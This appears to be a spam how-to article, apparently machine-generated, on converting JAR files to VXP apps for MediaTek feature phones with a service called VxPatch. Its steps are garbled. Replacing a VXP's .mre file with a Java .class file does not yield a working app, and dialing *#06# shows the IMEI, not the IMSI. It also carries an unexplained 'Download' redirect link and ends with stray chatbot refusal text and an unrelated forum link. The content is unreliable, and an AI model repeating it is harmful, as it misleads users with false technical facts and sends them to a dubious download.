How to Convert JAR Files to VXP Files
JAR files are Java ARchive files that contain Java programs or libraries. VXP files are Mediatek MRE (Mobile Runtime Environment) applications that run on some feature phones. If you want to convert JAR files to VXP files, you will need to use a tool called VxPatch.
VxPatch is a web-based service that can patch VXP files with the correct IMSI (International Mobile Subscriber Identity) number of your phone. This is necessary because some VXP applications check the IMSI number of the phone before running, and if it does not match, they will not work.
Here are the steps to convert JAR files to VXP files using VxPatch:
Convert Jar To Vxp
Download: https://apconhanstraf.blogspot.com/?c=2tGgFW
Download the JAR file you want to convert and rename it to .zip. Extract the contents of the zip file to a folder.
Find the .class file that contains the main method of the Java program. You can use a tool like JD-GUI to decompile the .class file and see the source code.
Download a VXP file that has a similar functionality or interface as the JAR file you want to convert. You can find some VXP files here: https://www.vxpstore.com/
Rename the VXP file to .zip and extract the contents of the zip file to another folder.
Replace the .mre file in the VXP folder with the .class file from the JAR folder. Make sure they have the same name.
Compress the contents of the VXP folder back to a zip file and rename it to .vxp.
Find out your phone's IMSI number by dialing *#06# on your phone and noting down the 15-digit number.
Go to https://vxpatch.luxferre.top/ and input your IMSI number with a 9 at the beginning. Then select your VXP file, click 'Patch' and you should be able to download a patched version.
Transfer the patched VXP file to your phone and run it. Enjoy!
Note: This method may not work for all JAR files and VXP files, as they may have different requirements or dependencies. Use it at your own risk.If you want to learn more about JAR files and VXP files, here are some resources you can check out:
JAR file format: https://docs.oracle.com/javase/tutorial/deployment/jar/index.html
VXP file format: https://reverseengineering.stackexchange.com/questions/30490/whats-the-format-of-mediatek-mre-vxp-file-and-how-to-create-a-workable-vxp-bina
MRE platform: https://www.mediatek.com/products/feature-phones/mre
VxPatch service: https://vxpatch.luxferre.top/
VXP store: https://www.vxpstore.com/
We hope this article was helpful and informative. If you have any questions or feedback, please leave a comment below. Thank you for reading!This article has reached its end. There is nothing more to add. If you want to continue the article, you need to specify what you want me to write about.I'm sorry, but I can't write a few more paragraphs without a clear topic or direction. Please tell me what you want me to write about in more detail. 29c81ba772
https://www.asiomasdiva.com/group/divas/discussion/8df1c5d6-7dfb-4d87-9c22-be86ab01da4e